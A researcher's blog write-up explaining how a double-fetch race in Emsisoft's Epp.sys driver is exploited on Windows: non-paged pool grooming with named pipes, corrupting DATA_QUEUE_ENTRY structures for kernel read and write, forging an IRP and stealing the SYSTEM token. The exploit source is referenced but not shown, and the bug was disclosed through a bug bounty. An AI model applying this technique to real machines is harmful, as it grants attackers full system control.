Exploitation of non paged pool overflow

Posted Oct 18, 2024 Updated Dec 14, 2024

By Adam Babis

11 min read

Hello, it is my first write up, I hope you will find it interesting to read :)

Introduction

In this blogpost I’m going to describe process of exploitation of heap based buffer overflow in one of Emsisoft’s kernel drivers in order to achieve privilege escalation. One of kernel drivers which Emsisoft anti-malware uses is Epp.sys. To communicate with this driver we can use IOCTL requests since the driver creates a device object and sets device io control dispatch routine in driver object. Moreover any user can open handle to this device, so it is a great attack vector to look for vulnerabilities which lead to privilege escalation.

In above figure you can see decompilation of function which creates a device and sets dispatch functions

When calling DeviceIoControl with 0x22240C io control code code, the epp driver will try to copy Peb→ProcessParameters→CommandLine.buffer and Peb→ProcessParameters→CurrentDirectory→DosPath.buffer to output buffer. The process from which these strings are copied is determined by pid in input buffer. That io control code indicates that the request is buffered, it means that the driver writes the output data to Irp→AssociatedIrp→SystemBuffer. This buffer is allocated in non paged pool. Before it copies previously mentioned strings to system buffer, it checks if these strings fit in system buffer, if does then it copies these buffers. But there is double fetch vulnerability, it fetches length of DosPath two times, once before copying and once while copying. If length of this unicode string was changed after the first fetch and before the second, it would cause buffer overflow. You can see decompilation of vulnerable code in bellow figure. Note that OutputBuffer is pointer to SystemBuffer + 0x8.

In above figure you can see decompilation of vulnerable function

Exploitation

Always before exploiting I make some assumptions to make exploitation process clearer. So we can:

Overflow non paged pool with controlled data
Control size of buffer which will be overflown
After every call to DeviceIoControl, we can’t know if the buffer was overflown, because there is no way to know if the race condition has been win
We can’t control how many bytes will be overflown, because SystemBuffer is cache aligned and in theory we can’t never know how many bytes will be used to align it to cache line. I described it in more details bellow.

System buffer is allocated as cache aligned, that basically means that real allocated size for this buffer will be (assuming that the output buffer size is greater than input buffer size and output buffer size smaller than 0x1B0): sizeof(POOL_HEADER) + 0x40 + sizeof output buffer. These additional 0x40 bytes are needed to align SystemBuffer to cache line because 0x40 is usually cache line size. Since we never know at which address it will be allocated, then in theory we can’t control how many bytes will be overflown because we don’t know how many bytes will be used to align. To make it more clear I made some example how it works. In following screenshots from windbg the r15 register is pointer to SystemBuffer, the output buffer size is 0x40 and output buffer size is greater that input buffer size.

In the above example we can see the allocated size is 0x90, since 0x40 (output buffer size) + 0x40 (alignment) + 0x10 (POOL_HEADER). If we substract allocated buffer address from SystemBuffer address we got 0x30. This contains pool header (0x10 bytes) and 0x20 bytes of alignment. So in this case after SystemBuffer there is 0x20 (because 0x40 – 0x20 = 0x20) bytes of padding to next pool header. Basically in this example the end of SystemBuffer is 0x20 bytes before next pool header. Another example shows case when the SystemBuffer is allocated at another address, so alignment is diffrent.

In above figure we can see that the offset from allocated buffer to SystemBuffer is 0x10 (which is sizeof pool header) because the SystemBuffer has been allocated at diffrent address so diffrent number of bytes were used to alignment. So in this case if we want to overflow the SystemBuffer we also need to overwrite 0x40 bytes of padding (because there is 0x40 bytes from end of the SystemBuffer to next pool header).

However I have found a way to control the number of bytes used to alignment. If allocated buffer is allocated by lfh and size of allocation modulo 0x40 is equal to 0, then align size will be always the same, so we can control overflow size. For example if the output buffer size is 0x70, then allocated buffer for this will be 0x70 + 0x40 (alignment) + 0x10 (size of pool header). So the allocated buffer will be 0xC0 size. Since 0xC0 modulo 0x40 is 0, then always the alignment size of System buffer will be the same. In this example the alignment size will be always 0x20 bytes size. So the allocated buffer will be looking like POOL_HEADER + 0x20 bytes alignment + SystemBuffer + 0x20 bytes padding. After calling DeviceIoControl, the epp.sys will copy CommandLine.buffer to SystemBuffer + 0x8. To simplify my exploit sets CommandLine.length to 8. DosPath.buffer will be used to buffer overflow and it will be copied to SystemBuffer + 0x10. So in this case in order to trigger buffer overflow, we should be very fast changing value of DosPath.length between value which is smaller than output buffer size – 0x10 (offset in SystemBuffer) and value greater than output buffer size – 0x10 (offset in SystemBuffer) + 0x20 (padding).

Since system buffer is allocated in non paged pool, I decided to overflow DATA_QUEUE_ENTRY structures to achieve arbitrary read and write primitives. DATA_QUEUE_ENTRY is undocumented structure used by named pipes to hold data written to named pipes. Here is definition of that structure:

struct DATA_QUEUE_ENTRY
{
    LIST_ENTRY NextEntry;
    _IRP* Irp;
    _SECURITY_CLIENT_CONTEXT* SecurityContext;
    uint32_t EntryType;
    uint32_t QuotaInEntry;
    uint32_t DataSize;
    uint32_t x;
    char Data[];
}

It is commonly used in kernel exploitation, and it is well documented how to utilize it’s functionality to achieve arbitrary read and write, so I highly recommend you to firstly read this before going further since there is explained what particular members of that structure does and I won’t describe it in as many details as there is described.

Achieving arbitrary read

So my exploit creates 10000 named pipes and writes 0x80 data to each one of these pipes. 0x80 of data because 0x80 + sizeof(DATA_QUEUE_ENTRY) + sizeof(POOL_HEADER) is 0xC0 so the size modulo 0x40 is 0. Since the size is smaller than 0x200, then it will be handled by lfh. Then my exploit frees some of these named pipes, to make “holes” between data queue entries. After this is done, there is high chance that system buffer will be adjacent to some data queue entry. In order to do so, allocated buffer for system buffer needs to be 0xC0 size, so the output buffer size needs to be 0x70 (0x70 + 0x40 alignment + 0x10 pool header). Then we need to prepare DosPath, to make it overflow pool header and flink of NextEntry of some DATA_QUEUE_ENTRY. The overflown flink has to be a pointer to DATA_QUEUE_ENTRY in user address space. In that user data queue entry we have to set EntryType to 1, DataSize to size of data to arbitrary read and Irp pointer to some Irp. That Irp has to have set AssociatedIrp.SystemBuffer to address from which we want to arbitrary read from. After this is done, we can trigger buffer overflow. To determine if some of data queue entries has been overflown, we need to read data from every named pipe using PeekNamedPipe. If some named pipe contains more data than was written to it, that means we have overflown data queue entry which belongs to that pipe. Then by calling PeekNamedPipe and reading 0x80 (earlier I mentioned that 0x80 bytes were written to each named pipe) + size to arbitrary read, we can read arbitrary memory.

While writing this exploit, 24H2 windows version hasn’t been released yet, but I decided to make the exploitation harder and make this exploit to work even without relying on leaking kernel addresses by using NtQuerySystemInformation. For those who don’t know, after 24H2 version processes with medium integrity can’t leak addresses of some structures in kernel by using NtQuerySystemInformation. Next to bypass kASLR and achieve arbitrary write we need to overflow another buffer. In order to do so my exploit creates another 15000 named pipes, and writes 0x40 data to each one, it makes that size of each buffer allocated for data queue entry will be 0x80 size (0x40 + sizeof(DATA_QUEUE_ENTRY) + sizeof(POOL_HEADER)). First unsigned int of data written to each named pipe is set to number which identifies that named pipe, I will later use it to find that pipe. Then my exploit frees some of these pipes, to make “holes” between data queue entries. After this is done, my exploit triggers another buffer overflow which overflows pool header and adjacent data queue entry. In overflown data queue entry my exploit sets EntryType to 0 and DataSize to 0x40 + sizeof(POOL_HEADER) + sizeof(DATA_QUEUE_ENTRY) + sizeof(unsigned int). It makes that overflown data queue entry can be used to achieve relative read. By using PeekNamedPipe we can read relative data to that data queue entry. Last unsigned integer of read data is earlier mentioned integer which identifies that named pipe. Next my exploit writes some data to that pipe using NtFsControlFile and 0x119FF8 ctl code. This makes that the data written will be hold in unbuffered data queue entry. By knowing some data queue entry address of that pipe, we can find that new data queue entry address since it will be linked in double linked list (NextEntry in DATA_QUEUE_ENTRY). Since unbuffered data queue entries allocates IRP structures and holds pointer to it, we can read that IRP. After we have read that Irp, we can read ThradListEntry from that irp, and that list has a pointer to ETHREAD structure. ETHREAD has a pointer to EPROCESS structure, so by using arbitrary read we can leak some EPROCESS address. Every EPROCESS structure is linked in doubly linked list, so since we have one EPROCESS address, we can get every other EPROCESS address. So we can traverse that linked list searching for EPROCESS of system process and of current process. Next we can read pointer to token from system eprocess. Then all we need to do is overwrite current eprocess token pointer with system token. In order to do so, we have to firstly forge irp, we can forge earlier read irp. To do so we need to set irp→AssociatedIrp.SystemBuffer to pointer to pointer to system token. Next set irp→UserAddress to address of token pointer in eprocess of current process. Then set irp→Flags to &~IRP_DEALLOCATE_BUFFER | IRP_BUFFERED_IO | IRP_INPUT_OPERATION. Next we have to set irp→ThreadListEntry.flink and irp→ThreadListEntry.blink to some LIST_ENTRY. After we have the forged irp, we have to put it in kernel address space, in order to do so we can write it to named pipe using NtFsControlFile and by traversing data queue entries double linked list find location of that forged irp. After we have located that forged irp, we have to set previously mentioned LIST_ENTRY flink and blink pointers to address of forged irp→ThreadListEntry (to make ThreadListEntry linked with some list, basically we need to make following condition true: irp->ThreadListEntry.Flink->Blink==irp->ThreadListEntry.Blink->Flink==&irp->ThreadListEntry). When we have prepared that forged irp, we can set pointer to it in data queue entry which we use to arbitrary read and then read 1 byte from that named pipe. It will make that the token pointer of eprocess of current process will be overwritten with system token. Next we can just spawn elevated command prompt. I have tested this exploit on 22H2 windows version, however it should work fine even on 24H2. Here is video proof of concept for this vulnerability:

And here is source code of my exploit.

I reported this vulnerability to Emsisoft bug bounty program and I have earned 300$.

This exploit is quite complex and I hope that I described it clearly. Thank you for reading this write up :)

buffer overflow

exploitation

This post is licensed under CC BY 4.0 by the author.